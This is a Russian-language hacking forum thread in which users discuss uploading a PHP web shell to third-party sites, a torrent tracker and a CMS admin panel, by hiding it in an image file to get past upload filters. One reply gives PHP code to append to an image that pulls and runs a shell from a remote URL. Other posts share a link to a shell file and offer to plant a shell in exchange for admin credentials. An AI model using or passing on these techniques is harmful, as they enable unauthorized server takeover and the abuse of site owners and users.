Нужно залить shell через картинку

Discussion in 'Болталка' started by S0ulVortex, 4 May 2009.

  1. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    Есть торрент в нем есть заливка картинок.
    Могу залить картинку и сделать её не jpeg а php.
    При заливке простой картинки все нормально и в пхп сохраняет. Вот ниже если поменять jpg на php то на сервер он зальёт как php.
    Code:
    -----------------------------220022761016327\r\nContent-Disposition: form-data; name="file"; 
    \nContent-Disposition: form-data; name="file"; filename="1.jpg"\r\nContent-Type: 
    и там дальше  исходник картинки.
    

    А вот когда шелл сохраняем в формате jpg и пытаюсь залить он не заливает.

    Вобщем кто знает как обойти фильтр.
    Все делается через post запрос.
    Или скинте картинку с шелом
     
  2. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    да все супер залил но теперь при заходе на эту страницу вылетает такое.


    [​IMG]
     
  3. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Ну так,ты напиши код в конце картинки нужный, и заливай.
    Например в конце допиши:
    <?
    if(isset($_GET['shell'])){
    include('http://mysite.com/shel.txt');
    }
    ?>
    И обратись к шеллу, http://torent.ru/img/gif.php?shell
     
  4. 2fed

    2fed Member

    Joined:
    26 Mar 2008
    Messages:
    44
    Likes Received:
    9
    Reputations:
    0
    ну вот у меня трабл тоже самое я могу ... но на фотку твою добавил р57 не сработало (
     
  5. 2fed

    2fed Member

    Joined:
    26 Mar 2008
    Messages:
    44
    Likes Received:
    9
    Reputations:
    0
    Грей обясни.. плз
     
  6. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    http://file-hran2006.narod.ru/shell.txt если нужен шелл, не ищи.
     
  7. 2fed

    2fed Member

    Joined:
    26 Mar 2008
    Messages:
    44
    Likes Received:
    9
    Reputations:
    0
    мне тока кодировка фотки ( шелл есть )
     
  8. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,026
    Likes Received:
    311
    Reputations:
    86
    Спасибо, много узнал, читая тему.
     
    _________________________
  9. 2fed

    2fed Member

    Joined:
    26 Mar 2008
    Messages:
    44
    Likes Received:
    9
    Reputations:
    0
    сделал всё как надо серавно тупит!!!
     
  10. oiki

    oiki New Member

    Joined:
    21 Jan 2010
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    кто-нибудь.. объясните пожалуста, как все-таки заливать через картинку? перепробовал все уже.
    это особенно не понимаю: "И обратись к шеллу, http://torent.ru/img/gif.php?shell"
    но как обратиться к shell.php если я заливал shell.gif...
     
  11. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Обращайся к shell.gif снужными get параметрами.И сейчас эта уязвимость уже ооочень не актуальна, почти везде все прикрыли уже.
     
  12. oiki

    oiki New Member

    Joined:
    21 Jan 2010
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    в таком случае есть ли еще способы?
     
  13. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    В каком именно случае?
     
  14. oiki

    oiki New Member

    Joined:
    21 Jan 2010
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    способы заливки шелла через картинку, раз "эта уязвимость уже ооочень не актуальна, почти везде все прикрыли уже."
     
  15. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Ну так,что бы такой способ сработал,должны быть кое какие условия все же)) нельзя же просто залить картинку,и получить шелл.Вот я и спрашиваю,а какие условия у вас? Моет вы на рапиду льете шелл,кто вас знает
     
  16. oiki

    oiki New Member

    Joined:
    21 Jan 2010
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    есть админка, в ней есть возможность залить картинку, пропускает только с расширением .jpg .gif
    и, нет, шелл не на рапиде естественно.
     
    #16 oiki, 5 Feb 2010
    Last edited: 5 Feb 2010
  17. SuNDowN

    SuNDowN Member

    Joined:
    31 Mar 2008
    Messages:
    25
    Likes Received:
    73
    Reputations:
    -8
    Если есть админка то тут намного проще! напиши двиг сайта может смогу помочь! ;)
     
  18. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Обычно это делается, если у тебя под рукой есть инклуд (или ещё что либо). Тупо заливаешь картинку со своим php кодом, и потом инклудишь чтобы код выполнился. А если ты просто залил картинку с php кодом, то просто так он исполнятся не будет ведь.
     
  19. oiki

    oiki New Member

    Joined:
    21 Jan 2010
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    какая-то CMS KalugaSity. дык еслибы был инклуд я и не спрашивал =)
     
  20. SuNDowN

    SuNDowN Member

    Joined:
    31 Mar 2008
    Messages:
    25
    Likes Received:
    73
    Reputations:
    -8
    Если хочешь скинь админские права и ссыль на сайт в ПМ попробую залить шелл, если выйдет дам ссылку ;)
     
Loading...